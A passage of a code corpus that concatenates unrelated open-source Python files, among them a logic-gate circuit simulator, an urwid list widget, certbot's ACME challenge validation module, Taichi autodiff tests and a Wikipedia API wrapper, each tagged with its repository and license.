return self.outputGateValue
class OrGate(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.outputGateName = values[1].strip()
self.outputGate = 0
self.outputGateValue = 0
second_pass = values[0].split('OR')
self.inputGate1 = 0
self.inputGate1Name = second_pass[0].strip()
self.inputGate2 = 0
self.inputGate2Name = second_pass[1].strip()
self.outputGateCalculated = False
def __str__(self):
return "OrGate inputGate1 = {0}, inputGate2 = {1}, outputGate = {2}".format(self.inputGate1Name,
self.inputGate2Name,
self.outputGateName)
def hookup(self, gate_list):
input_gate1_attach = filter(filter_for_output_gate(self.inputGate1Name), gate_list)
self.inputGate1 = input_gate1_attach[0]
input_gate2_attach = filter(filter_for_output_gate(self.inputGate2Name), gate_list)
self.inputGate2 = input_gate2_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
value1 = self.inputGate1.calculate_gate()
value2 = self.inputGate2.calculate_gate()
self.outputGateValue = value1 | value2
self.outputGateCalculated = True
return self.outputGateValue
class LeftShift(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.outputGate = 0
self.outputGateValue = 0
self.outputGateName = values[1].strip()
second_pass = values[0].split('LSHIFT')
self.inputGateName = second_pass[0].strip()
self.inputGate = 0
self.inputValue = int(second_pass[1].strip())
self.outputGateCalculated = False
def __str__(self):
return "LeftShift inputGate = {0}, inputValue = {1}, outputGate = {2}".format(self.inputGateName,
self.inputValue,
self.outputGateName)
def hookup(self, gate_list):
input_gate_attach = filter(filter_for_output_gate(self.inputGateName), gate_list)
self.inputGate = input_gate_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
value1 = self.inputGate.calculate_gate()
left_shift_by = self.inputValue
self.outputGateValue = value1 << left_shift_by
self.outputGateCalculated = True
return self.outputGateValue
class RightShift(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.outputGate = 0
self.outputGateValue = 0
self.outputGateName = values[1].strip()
second_pass = values[0].split('RSHIFT')
self.inputGateName = second_pass[0].strip()
self.inputGate = 0
self.inputValue = int(second_pass[1].strip())
self.outputGateCalculated = False
def __str__(self):
return "RightShift inputGate = {0}, inputValue = {1}, outputGate = {2}".format(self.inputGateName,
self.inputValue,
self.outputGateName)
def hookup(self, gate_list):
input_gate_attach = filter(filter_for_output_gate(self.inputGateName), gate_list)
self.inputGate = input_gate_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
value1 = self.inputGate.calculate_gate()
right_shift_by = self.inputValue
self.outputGateValue = value1 >> right_shift_by
self.outputGateCalculated = True
return self.outputGateValue
class NotGate(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.outputGateName = values[1].strip()
self.outputGate = 0
self.outputGateValue = 0
second_pass = values[0].split('NOT')
self.inputGateName = second_pass[1].strip()
self.inputGate = 0
self.outputGateCalculated = False
def __str__(self):
return "NotGate inputGate = {0}, outputGate = {1}".format(self.inputGateName, self.outputGateName)
def hookup(self, gate_list):
input_gate_attach = filter(filter_for_output_gate(self.inputGateName), gate_list)
self.inputGate = input_gate_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
value1 = self.inputGate.calculate_gate()
self.outputGateValue = ~ value1
self.outputGateCalculated = True
return self.outputGateValue
class InputGate(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.inputGate = 0
self.inputGateName = values[0].strip()
self.outputGate = 0
self.outputGateName = values[1].strip()
self.outputGateValue = 0
self.outputGateCalculated = False
def __str__(self):
return "InputGate inputValue = {0}, outputGate = {1}".format(self.inputGateName, self.outputGateName)
def hookup(self, gate_list):
if not self.inputGateName.isdigit():
input_gate_attach = filter(filter_for_output_gate(self.inputGateName), gate_list)
self.inputGate = input_gate_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
if self.inputGateName.isdigit():
self.outputGateValue = int(self.inputGateName)
else:
self.outputGateValue = self.inputGate.calculate_gate()
self.outputGateCalculated = True
return self.outputGateValue
def create_gate(line):
if 'AND' in line:
return AndGate(line)
elif 'OR' in line:
return OrGate(line)
elif 'NOT' in line:
return NotGate(line)
elif 'LSHIFT' in line:
return LeftShift(line)
elif 'RSHIFT' in line:
return RightShift(line)
else:
return InputGate(line)
def filter_for_output_gate(gate_name):
def my_filter(x):
return x.outputGateName == gate_name
return my_filter
| TheYachtingClam/AdventPython | Day7-Some Assembly Required/Gates.py | Python | gpl-3.0 | 8,336 |
# -*- coding: utf-8 -*-
import urwid
class FancyListBox(urwid.LineBox):
def get_listbox(self, items):
class _FancyListBox(urwid.ListBox):
def keypress(_self, size, key):
key = super(_FancyListBox, _self).keypress(size, key)
self.update_corners(_self.ends_visible(size))
return key
def render(_self, size, focus=False):
self.update_corners(_self.ends_visible(size))
return super(_FancyListBox, _self).render(size, focus)
return _FancyListBox(urwid.SimpleListWalker(items))
def __init__(self, items, title="",
tlcorner=u'┌', tline=u' ', lline=u' ',
trcorner=u'┐', blcorner=u'└', rline=u' ',
bline=u' ', brcorner=u'┘'):
#self.length = len(items[2].contents) + 5
try:
x = items[2].contents
except:
x = items[2].get_text()[0]
#self.length = len(items[2].get_text()[0])
self.length = len(x)
self.listbox = self.get_listbox(items)
tline, bline = urwid.Divider(tline), urwid.Divider(bline)
lline, rline = urwid.SolidFill(lline), urwid.SolidFill(rline)
self.tlcorner, self.trcorner = urwid.Text(tlcorner), urwid.Text(trcorner)
self.blcorner, self.brcorner = urwid.Text(blcorner), urwid.Text(brcorner)
title_widget = urwid.Text(self.format_title(title))
tline_widget = urwid.Columns([
tline,
('flow', title_widget),
tline,
])
top = urwid.Columns([
('fixed', 1, self.tlcorner),
tline_widget,
('fixed', 1, self.trcorner),
])
middle = urwid.Columns([
('fixed', 1, lline),
self.listbox,
('fixed', 1, rline),
], box_columns=[0, 2], focus_column=1)
bottom = urwid.Columns([
('fixed', 1, self.blcorner), bline, ('fixed', 1, self.brcorner),
])
pile = urwid.Pile([('flow', top), middle, ('flow', bottom)], focus_item=1)
urwid.WidgetDecoration.__init__(self, self.listbox)
urwid.WidgetWrap.__init__(self, pile)
def top_scroll(self):
self.trcorner.set_text(u"⇧")
self.tlcorner.set_text(u"⇧")
def top_noscroll(self):
self.trcorner.set_text(u"┐")
self.tlcorner.set_text(u"┌")
def bottom_scroll(self):
self.brcorner.set_text(u"⇩")
self.blcorner.set_text(u"⇩")
def bottom_noscroll(self):
self.brcorner.set_text(u"┘")
self.blcorner.set_text(u"└")
def update_corners(self, ends):
if 'top' in ends:
self.top_noscroll()
else:
self.top_scroll()
if 'bottom' in ends:
self.bottom_noscroll()
else:
self.bottom_scroll()
| dustinlacewell/console | console/widgets/listbox.py | Python | mit | 2,895 |
"""ACME Identifier Validation Challenges."""
import abc
import functools
import hashlib
import logging
import socket
from cryptography.hazmat.primitives import hashes
import OpenSSL
import requests
from acme import errors
from acme import crypto_util
from acme import fields
from acme import jose
logger = logging.getLogger(__name__)
# pylint: disable=too-few-public-methods
class Challenge(jose.TypedJSONObjectWithFields):
# _fields_to_partial_json | pylint: disable=abstract-method
"""ACME challenge."""
TYPES = {}
@classmethod
def from_json(cls, jobj):
try:
return super(Challenge, cls).from_json(jobj)
except jose.UnrecognizedTypeError as error:
logger.debug(error)
return UnrecognizedChallenge.from_json(jobj)
class ChallengeResponse(jose.TypedJSONObjectWithFields):
# _fields_to_partial_json | pylint: disable=abstract-method
"""ACME challenge response."""
TYPES = {}
resource_type = 'challenge'
resource = fields.Resource(resource_type)
class UnrecognizedChallenge(Challenge):
"""Unrecognized challenge.
ACME specification defines a generic framework for challenges and
defines some standard challenges that are implemented in this
module. However, other implementations (including peers) might
define additional challenge types, which should be ignored if
unrecognized.
:ivar jobj: Original JSON decoded object.
"""
def __init__(self, jobj):
super(UnrecognizedChallenge, self).__init__()
object.__setattr__(self, "jobj", jobj)
def to_partial_json(self):
# pylint: disable=no-member
return self.jobj
@classmethod
def from_json(cls, jobj):
return cls(jobj)
class _TokenChallenge(Challenge):
"""Challenge with token.
:ivar bytes token:
"""
TOKEN_SIZE = 128 / 8 # Based on the entropy value from the spec
"""Minimum size of the :attr:`token` in bytes."""
# TODO: acme-spec doesn't specify token as base64-encoded value
token = jose.Field(
"token", encoder=jose.encode_b64jose, decoder=functools.partial(
jose.decode_b64jose, size=TOKEN_SIZE, minimum=True))
# XXX: rename to ~token_good_for_url
@property
def good_token(self): # XXX: @token.decoder
"""Is `token` good?
.. todo:: acme-spec wants "It MUST NOT contain any non-ASCII
characters", but it should also warrant that it doesn't
contain ".." or "/"...
"""
# TODO: check that path combined with uri does not go above
# URI_ROOT_PATH!
return b'..' not in self.token and b'/' not in self.token
class KeyAuthorizationChallengeResponse(ChallengeResponse):
"""Response to Challenges based on Key Authorization.
:param unicode key_authorization:
"""
key_authorization = jose.Field("keyAuthorization")
thumbprint_hash_function = hashes.SHA256
def verify(self, chall, account_public_key):
"""Verify the key authorization.
:param KeyAuthorization chall: Challenge that corresponds to
this response.
:param JWK account_public_key:
:return: ``True`` iff verification of the key authorization was
successful.
:rtype: bool
"""
parts = self.key_authorization.split('.') # pylint: disable=no-member
if len(parts) != 2:
logger.debug("Key authorization (%r) is not well formed",
self.key_authorization)
return False
if parts[0] != chall.encode("token"):
logger.debug("Mismatching token in key authorization: "
"%r instead of %r", parts[0], chall.encode("token"))
return False
thumbprint = jose.b64encode(account_public_key.thumbprint(
hash_function=self.thumbprint_hash_function)).decode()
if parts[1] != thumbprint:
logger.debug("Mismatching thumbprint in key authorization: "
"%r instead of %r", parts[0], thumbprint)
return False
return True
class KeyAuthorizationChallenge(_TokenChallenge):
# pylint: disable=abstract-class-little-used,too-many-ancestors
"""Challenge based on Key Authorization.
:param response_cls: Subclass of `KeyAuthorizationChallengeResponse`
that will be used to generate `response`.
"""
__metaclass__ = abc.ABCMeta
response_cls = NotImplemented
thumbprint_hash_function = (
KeyAuthorizationChallengeResponse.thumbprint_hash_function)
def key_authorization(self, account_key):
"""Generate Key Authorization.
:param JWK account_key:
:rtype unicode:
"""
return self.encode("token") + "." + jose.b64encode(
account_key.thumbprint(
hash_function=self.thumbprint_hash_function)).decode()
def response(self, account_key):
"""Generate response to the challenge.
:param JWK account_key:
:returns: Response (initialized `response_cls`) to the challenge.
:rtype: KeyAuthorizationChallengeResponse
"""
return self.response_cls(
key_authorization=self.key_authorization(account_key))
@abc.abstractmethod
def validation(self, account_key, **kwargs):
"""Generate validation for the challenge.
Subclasses must implement this method, but they are likely to
return completely different data structures, depending on what's
necessary to complete the challenge. Interepretation of that
return value must be known to the caller.
:param JWK account_key:
:returns: Challenge-specific validation.
"""
raise NotImplementedError() # pragma: no cover
def response_and_validation(self, account_key, *args, **kwargs):
"""Generate response and validation.
Convenience function that return results of `response` and
`validation`.
:param JWK account_key:
:rtype: tuple
"""
return (self.response(account_key),
self.validation(account_key, *args, **kwargs))
@ChallengeResponse.register
class DNS01Response(KeyAuthorizationChallengeResponse):
"""ACME dns-01 challenge response."""
typ = "dns-01"
def simple_verify(self, chall, domain, account_public_key):
"""Simple verify.
:param challenges.DNS01 chall: Corresponding challenge.
:param unicode domain: Domain name being verified.
:param JWK account_public_key: Public key for the key pair
being authorized.
:returns: ``True`` iff validation with the TXT records resolved from a
DNS server is successful.
:rtype: bool
"""
if not self.verify(chall, account_public_key):
logger.debug("Verification of key authorization in response failed")
return False
validation_domain_name = chall.validation_domain_name(domain)
validation = chall.validation(account_public_key)
logger.debug("Verifying %s at %s...", chall.typ, validation_domain_name)
try:
from acme import dns_resolver
except ImportError: # pragma: no cover
raise errors.DependencyError("Local validation for 'dns-01' "
"challenges requires 'dnspython'")
txt_records = dns_resolver.txt_records_for_name(validation_domain_name)
exists = validation in txt_records
if not exists:
logger.debug("Key authorization from response (%r) doesn't match "
"any DNS response in %r", self.key_authorization,
txt_records)
return exists
@Challenge.register # pylint: disable=too-many-ancestors
class DNS01(KeyAuthorizationChallenge):
"""ACME dns-01 challenge."""
response_cls = DNS01Response
typ = response_cls.typ
LABEL = "_acme-challenge"
"""Label clients prepend to the domain name being validated."""
def validation(self, account_key, **unused_kwargs):
"""Generate validation.
:param JWK account_key:
:rtype: unicode
"""
return jose.b64encode(hashlib.sha256(self.key_authorization(
account_key).encode("utf-8")).digest()).decode()
def validation_domain_name(self, name):
"""Domain name for TXT validation record.
:param unicode name: Domain name being validated.
"""
return "{0}.{1}".format(self.LABEL, name)
@ChallengeResponse.register
class HTTP01Response(KeyAuthorizationChallengeResponse):
"""ACME http-01 challenge response."""
typ = "http-01"
PORT = 80
"""Verification port as defined by the protocol.
You can override it (e.g. for testing) by passing ``port`` to
`simple_verify`.
"""
WHITESPACE_CUTSET = "\n\r\t "
"""Whitespace characters which should be ignored at the end of the body."""
def simple_verify(self, chall, domain, account_public_key, port=None):
"""Simple verify.
:param challenges.SimpleHTTP chall: Corresponding challenge.
:param unicode domain: Domain name being verified.
:param JWK account_public_key: Public key for the key pair
being authorized.
:param int port: Port used in the validation.
:returns: ``True`` iff validation with the files currently served by the
HTTP server is successful.
:rtype: bool
"""
if not self.verify(chall, account_public_key):
logger.debug("Verification of key authorization in response failed")
return False
# TODO: ACME specification defines URI template that doesn't
# allow to use a custom port... Make sure port is not in the
# request URI, if it's standard.
if port is not None and port != self.PORT:
logger.warning(
"Using non-standard port for http-01 verification: %s", port)
domain += ":{0}".format(port)
uri = chall.uri(domain)
logger.debug("Verifying %s at %s...", chall.typ, uri)
try:
http_response = requests.get(uri)
except requests.exceptions.RequestException as error:
logger.error("Unable to reach %s: %s", uri, error)
return False
logger.debug("Received %s: %s. Headers: %s", http_response,
http_response.text, http_response.headers)
challenge_response = http_response.text.rstrip(self.WHITESPACE_CUTSET)
if self.key_authorization != challenge_response:
logger.debug("Key authorization from response (%r) doesn't match "
"HTTP response (%r)", self.key_authorization,
challenge_response)
return False
return True
@Challenge.register # pylint: disable=too-many-ancestors
class HTTP01(KeyAuthorizationChallenge):
"""ACME http-01 challenge."""
response_cls = HTTP01Response
typ = response_cls.typ
URI_ROOT_PATH = ".well-known/acme-challenge"
"""URI root path for the server provisioned resource."""
@property
def path(self):
"""Path (starting with '/') for provisioned resource.
:rtype: string
"""
return '/' + self.URI_ROOT_PATH + '/' + self.encode('token')
def uri(self, domain):
"""Create an URI to the provisioned resource.
Forms an URI to the HTTPS server provisioned resource
(containing :attr:`~SimpleHTTP.token`).
:param unicode domain: Domain name being verified.
:rtype: string
"""
return "http://" + domain + self.path
def validation(self, account_key, **unused_kwargs):
"""Generate validation.
:param JWK account_key:
:rtype: unicode
"""
return self.key_authorization(account_key)
@ChallengeResponse.register
class TLSSNI01Response(KeyAuthorizationChallengeResponse):
"""ACME tls-sni-01 challenge response."""
typ = "tls-sni-01"
DOMAIN_SUFFIX = b".acme.invalid"
"""Domain name suffix."""
PORT = 443
"""Verification port as defined by the protocol.
You can override it (e.g. for testing) by passing ``port`` to
`simple_verify`.
"""
@property
def z(self): # pylint: disable=invalid-name
"""``z`` value used for verification.
:rtype bytes:
"""
return hashlib.sha256(
self.key_authorization.encode("utf-8")).hexdigest().lower().encode()
@property
def z_domain(self):
"""Domain name used for verification, generated from `z`.
:rtype bytes:
"""
return self.z[:32] + b'.' + self.z[32:] + self.DOMAIN_SUFFIX
def gen_cert(self, key=None, bits=2048):
"""Generate tls-sni-01 certificate.
:param OpenSSL.crypto.PKey key: Optional private key used in
certificate generation. If not provided (``None``), then
fresh key will be generated.
:param int bits: Number of bits for newly generated key.
:rtype: `tuple` of `OpenSSL.crypto.X509` and `OpenSSL.crypto.PKey`
"""
if key is None:
key = OpenSSL.crypto.PKey()
key.generate_key(OpenSSL.crypto.TYPE_RSA, bits)
return crypto_util.gen_ss_cert(key, [
# z_domain is too big to fit into CN, hence first dummy domain
'dummy', self.z_domain.decode()], force_san=True), key
def probe_cert(self, domain, **kwargs):
"""Probe tls-sni-01 challenge certificate.
:param unicode domain:
"""
# TODO: domain is not necessary if host is provided
if "host" not in kwargs:
host = socket.gethostbyname(domain)
logging.debug('%s resolved to %s', domain, host)
kwargs["host"] = host
kwargs.setdefault("port", self.PORT)
kwargs["name"] = self.z_domain
# TODO: try different methods?
# pylint: disable=protected-access
return crypto_util.probe_sni(**kwargs)
def verify_cert(self, cert):
"""Verify tls-sni-01 challenge certificate.
:param OpensSSL.crypto.X509 cert: Challenge certificate.
:returns: Whether the certificate was successfully verified.
:rtype: bool
"""
# pylint: disable=protected-access
sans = crypto_util._pyopenssl_cert_or_req_san(cert)
logging.debug('Certificate %s. SANs: %s', cert.digest('sha1'), sans)
return self.z_domain.decode() in sans
def simple_verify(self, chall, domain, account_public_key,
cert=None, **kwargs):
"""Simple verify.
Verify ``validation`` using ``account_public_key``, optionally
probe tls-sni-01 certificate and check using `verify_cert`.
:param .challenges.TLSSNI01 chall: Corresponding challenge.
:param str domain: Domain name being validated.
:param JWK account_public_key:
:param OpenSSL.crypto.X509 cert: Optional certificate. If not
provided (``None``) certificate will be retrieved using
`probe_cert`.
:param int port: Port used to probe the certificate.
:returns: ``True`` iff client's control of the domain has been
verified.
:rtype: bool
"""
if not self.verify(chall, account_public_key):
logger.debug("Verification of key authorization in response failed")
return False
if cert is None:
try:
cert = self.probe_cert(domain=domain, **kwargs)
except errors.Error as error:
logger.debug(error, exc_info=True)
return False
return self.verify_cert(cert)
@Challenge.register # pylint: disable=too-many-ancestors
class TLSSNI01(KeyAuthorizationChallenge):
"""ACME tls-sni-01 challenge."""
response_cls = TLSSNI01Response
typ = response_cls.typ
# boulder#962, ietf-wg-acme#22
#n = jose.Field("n", encoder=int, decoder=int)
def validation(self, account_key, **kwargs):
"""Generate validation.
:param JWK account_key:
:param OpenSSL.crypto.PKey cert_key: Optional private key used
in certificate generation. If not provided (``None``), then
fresh key will be generated.
:rtype: `tuple` of `OpenSSL.crypto.X509` and `OpenSSL.crypto.PKey`
"""
return self.response(account_key).gen_cert(key=kwargs.get('cert_key'))
@Challenge.register # pylint: disable=too-many-ancestors
class DNS(_TokenChallenge):
"""ACME "dns" challenge."""
typ = "dns"
LABEL = "_acme-challenge"
"""Label clients prepend to the domain name being validated."""
def gen_validation(self, account_key, alg=jose.RS256, **kwargs):
"""Generate validation.
:param .JWK account_key: Private account key.
:param .JWA alg:
:returns: This challenge wrapped in `.JWS`
:rtype: .JWS
"""
return jose.JWS.sign(
payload=self.json_dumps(sort_keys=True).encode('utf-8'),
key=account_key, alg=alg, **kwargs)
def check_validation(self, validation, account_public_key):
"""Check validation.
:param JWS validation:
:param JWK account_public_key:
:rtype: bool
"""
if not validation.verify(key=account_public_key):
return False
try:
return self == self.json_loads(
validation.payload.decode('utf-8'))
except jose.DeserializationError as error:
logger.debug("Checking validation for DNS failed: %s", error)
return False
def gen_response(self, account_key, **kwargs):
"""Generate response.
:param .JWK account_key: Private account key.
:param .JWA alg:
:rtype: DNSResponse
"""
return DNSResponse(validation=self.gen_validation(
account_key, **kwargs))
def validation_domain_name(self, name):
"""Domain name for TXT validation record.
:param unicode name: Domain name being validated.
"""
return "{0}.{1}".format(self.LABEL, name)
@ChallengeResponse.register
class DNSResponse(ChallengeResponse):
"""ACME "dns" challenge response.
:param JWS validation:
"""
typ = "dns"
validation = jose.Field("validation", decoder=jose.JWS.from_json)
def check_validation(self, chall, account_public_key):
"""Check validation.
:param challenges.DNS chall:
:param JWK account_public_key:
:rtype: bool
"""
return chall.check_validation(self.validation, account_public_key)
| jtl999/certbot | acme/acme/challenges.py | Python | apache-2.0 | 18,834 |
# -*- coding: utf-8 -*-
# Copyright © 2014-2018 GWHAT Project Contributors
# https://github.com/jnsebgosselin/gwhat
#
# This file is part of GWHAT (Ground-Water Hydrograph Analysis Toolbox).
# Licensed under the terms of the GNU General Public License.
# Standard library imports :
import platform
# Third party imports :
from PyQt5.QtGui import QIcon, QFont, QFontDatabase
from PyQt5.QtCore import QSize
class StyleDB(object):
def __init__(self):
# ---- frame
self.frame = 22
self.HLine = 52
self.VLine = 53
self.sideBarWidth = 275
# ----- colors
self.red = '#C83737'
self.lightgray = '#E6E6E6'
self.rain = '#0000CC'
self.snow = '0.7'
self.wlvl = '#0000CC' # '#000099'
if platform.system() == 'Windows':
self.font1 = QFont('Segoe UI', 11) # Calibri, Cambria
self.font_console = QFont('Segoe UI', 9)
self.font_menubar = QFont('Segoe UI', 10)
elif platform.system() == 'Linux':
self.font1 = QFont('Ubuntu', 11)
self.font_console = QFont('Ubuntu', 9)
self.font_menubar = QFont('Ubuntu', 10)
# database = QFontDatabase()
# print database.families()
if platform.system() == 'Windows':
self.fontfamily = "Segoe UI" # "Cambria" #"Calibri" #"Segoe UI""
elif platform.system() == 'Linux':
self.fontfamily = "Ubuntu"
# self.fontSize1.setPointSize(11)
# 17 = QtGui.QFrame.Box | QtGui.QFrame.Plain
# 22 = QtGui.QFrame.StyledPanel | QtGui.QFrame.Plain
# 20 = QtGui.QFrame.HLine | QtGui.QFrame.Plain
# 52 = QtGui.QFrame.HLine | QtGui.QFrame.Sunken
# 53 = QtGui.QFrame.VLine | QtGui.QFrame.Sunken
| jnsebgosselin/WHAT | gwhat/common/styles.py | Python | gpl-3.0 | 1,792 |
from taichi.lang import impl
from taichi.lang.misc import get_host_arch_list
import taichi as ti
from tests import test_utils
@test_utils.test(require=ti.extension.adstack)
def test_ad_if_simple():
x = ti.field(ti.f32, shape=())
y = ti.field(ti.f32, shape=())
ti.root.lazy_grad()
@ti.kernel
def func():
if x[None] > 0.:
y[None] = x[None]
x[None] = 1
y.grad[None] = 1
func()
func.grad()
assert x.grad[None] == 1
@test_utils.test(require=ti.extension.adstack)
def test_ad_if():
x = ti.field(ti.f32, shape=2)
y = ti.field(ti.f32, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func(i: ti.i32):
if x[i] > 0:
y[i] = x[i]
else:
y[i] = 2 * x[i]
x[0] = 0
x[1] = 1
y.grad[0] = 1
y.grad[1] = 1
func(0)
func.grad(0)
func(1)
func.grad(1)
assert x.grad[0] == 2
assert x.grad[1] == 1
@test_utils.test(require=ti.extension.adstack)
def test_ad_if_nested():
n = 20
x = ti.field(ti.f32, shape=n)
y = ti.field(ti.f32, shape=n)
z = ti.field(ti.f32, shape=n)
ti.root.lazy_grad()
@ti.kernel
def func():
for i in x:
if x[i] < 2:
if x[i] == 0:
y[i] = 0
else:
y[i] = z[i] * 1
else:
if x[i] == 2:
y[i] = z[i] * 2
else:
y[i] = z[i] * 3
z.fill(1)
for i in range(n):
x[i] = i % 4
func()
for i in range(n):
assert y[i] == i % 4
y.grad[i] = 1
func.grad()
for i in range(n):
assert z.grad[i] == i % 4
@test_utils.test(require=ti.extension.adstack)
def test_ad_if_mutable():
x = ti.field(ti.f32, shape=2)
y = ti.field(ti.f32, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func(i: ti.i32):
t = x[i]
if t > 0:
y[i] = t
else:
y[i] = 2 * t
x[0] = 0
x[1] = 1
y.grad[0] = 1
y.grad[1] = 1
func(0)
func.grad(0)
func(1)
func.grad(1)
assert x.grad[0] == 2
assert x.grad[1] == 1
@test_utils.test(require=ti.extension.adstack)
def test_ad_if_parallel():
x = ti.field(ti.f32, shape=2)
y = ti.field(ti.f32, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func():
for i in range(2):
t = x[i]
if t > 0:
y[i] = t
else:
y[i] = 2 * t
x[0] = 0
x[1] = 1
y.grad[0] = 1
y.grad[1] = 1
func()
func.grad()
assert x.grad[0] == 2
assert x.grad[1] == 1
@test_utils.test(require=[ti.extension.adstack, ti.extension.data64],
default_fp=ti.f64)
def test_ad_if_parallel_f64():
x = ti.field(ti.f64, shape=2)
y = ti.field(ti.f64, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func():
for i in range(2):
t = x[i]
if t > 0:
y[i] = t
else:
y[i] = 2 * t
x[0] = 0
x[1] = 1
y.grad[0] = 1
y.grad[1] = 1
func()
func.grad()
assert x.grad[0] == 2
assert x.grad[1] == 1
@test_utils.test(require=ti.extension.adstack)
def test_ad_if_parallel_complex():
x = ti.field(ti.f32, shape=2)
y = ti.field(ti.f32, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func():
ti.parallelize(1)
for i in range(2):
t = 0.0
if x[i] > 0:
t = 1 / x[i]
y[i] = t
x[0] = 0
x[1] = 2
y.grad[0] = 1
y.grad[1] = 1
func()
func.grad()
assert x.grad[0] == 0
assert x.grad[1] == -0.25
@test_utils.test(require=[ti.extension.adstack, ti.extension.data64],
default_fp=ti.f64)
def test_ad_if_parallel_complex_f64():
x = ti.field(ti.f64, shape=2)
y = ti.field(ti.f64, shape=2)
ti.root.lazy_grad()
@ti.kernel
def func():
ti.parallelize(1)
for i in range(2):
t = 0.0
if x[i] > 0:
t = 1 / x[i]
y[i] = t
x[0] = 0
x[1] = 2
y.grad[0] = 1
y.grad[1] = 1
func()
func.grad()
assert x.grad[0] == 0
assert x.grad[1] == -0.25
@test_utils.test(arch=get_host_arch_list())
def test_stack():
@ti.kernel
def func():
impl.call_internal("test_stack")
func()
| yuanming-hu/taichi | tests/python/test_ad_if.py | Python | mit | 4,447 |
"""
twiki.wikipedia
~~~~~~~~~~~~~~~
Wikipedia API wrapper
"""
import wikipedia
class WikipediaError(Exception):
def __init__(self, msg, code=500):
self.msg = msg
self.code = code
super(WikipediaError, self).__init__(msg, code)
class Wikipedia(object):
"""Wraps around wikipedia API wrapper for ease of use in stripping down
massive wikipedia pages to basic information and for easier error handling
"""
def __init__(self, wikipedia=wikipedia):
self._wikipedia = wikipedia
def search(self, term):
"Finds wikipedia page titles and returns dictionaries of title and url."
return [self._build_basic_info(title) for title in self._search(term)]
def get_page(self, title):
"""Finds a wikipedia page and returns a dictionary of title, url and
shortened summary.
"""
return self._transform_page(self._get_page(title))
def _search(self, term):
"Attempts to search wikipedia for potentially matching pages"
try:
return self._wikipedia.search(term)
except wikipedia.WikipediaException as e:
self._throw_from_wikipedia_error(e, "Sorry, we're having trouble with Wikipedia right now.")
def _build_basic_info(self, title):
return {'title': title, 'url': self._build_url(title)}
def _get_page(self, title):
"""Attempts to retrieve a fully wikipedia page and throws a WikipediaError
if it can't."""
try:
return self._wikipedia.page(title)
except wikipedia.DisambiguationError as e:
self._throw_from_wikipedia_error(e, "This is a disambiguation page", 301)
except wikipedia.WikipediaException as e:
self._throw_from_wikipedia_error(e, "Couldn't find wikipedia page")
def _transform_page(self, page):
summary = self._shorten_summary(page.summary)
return {'title': page.title, 'summary': summary, 'url': page.url}
@staticmethod
def _shorten_summary(summary, word_limit=25):
"""Shortens a potentially long summary into a shorter summary."""
if summary.count(' ') <= word_limit:
return summary
else:
cut_off_summary = summary.split()[:word_limit]
return '{0} ...'.format(' '.join(cut_off_summary))
@staticmethod
def _build_url(title):
url = 'https://www.wikipedia.org/wiki/{0}'
return url.format(title.replace(' ', '_'))
@staticmethod
def _throw_from_wikipedia_error(e, msg=None, code=500):
"""Raises an application specific error from either the provided message
or the error passed to it
"""
if msg is None:
msg = e.error
raise WikipediaError(msg, code)
| justanr/twiki | twiki/wiki.py | Python | mit | 2,785 |
# coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1ImageStreamImportStatus(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
# The key is attribute name
# and the value is attribute type.
swagger_types = {
'_import': 'V1ImageStream',
'repository': 'V1RepositoryImportStatus',
'images': 'list[V1ImageImportStatus]'
}
# The key is attribute name
# and the value is json key in definition.
attribute_map = {
'_import': 'import',
'repository': 'repository',
'images': 'images'
}
def __init__(self, _import=None, repository=None, images=None):
"""
V1ImageStreamImportStatus - a model defined in Swagger
"""
self.__import = _import
self._repository = repository
self._images = images
@property
def _import(self):
"""
Gets the _import of this V1ImageStreamImportStatus.
Import is the image stream that was successfully updated or created when 'to' was set.
:return: The _import of this V1ImageStreamImportStatus.
:rtype: V1ImageStream
"""
return self.__import
@_import.setter
def _import(self, _import):
"""
Sets the _import of this V1ImageStreamImportStatus.
Import is the image stream that was successfully updated or created when 'to' was set.
:param _import: The _import of this V1ImageStreamImportStatus.
:type: V1ImageStream
"""
self.__import = _import
@property
def repository(self):
"""
Gets the repository of this V1ImageStreamImportStatus.
Repository is set if spec.repository was set to the outcome of the import
:return: The repository of this V1ImageStreamImportStatus.
:rtype: V1RepositoryImportStatus
"""
return self._repository
@repository.setter
def repository(self, repository):
"""
Sets the repository of this V1ImageStreamImportStatus.
Repository is set if spec.repository was set to the outcome of the import
:param repository: The repository of this V1ImageStreamImportStatus.
:type: V1RepositoryImportStatus
"""
self._repository = repository
@property
def images(self):
"""
Gets the images of this V1ImageStreamImportStatus.
Images is set with the result of importing spec.images
:return: The images of this V1ImageStreamImportStatus.
:rtype: list[V1ImageImportStatus]
"""
return self._images
@images.setter
def images(self, images):
"""
Sets the images of this V1ImageStreamImportStatus.
Images is set with the result of importing spec.images
:param images: The images of this V1ImageStreamImportStatus.
:type: list[V1ImageImportStatus]
"""
self._images = images
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(V1ImageStreamImportStatus.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
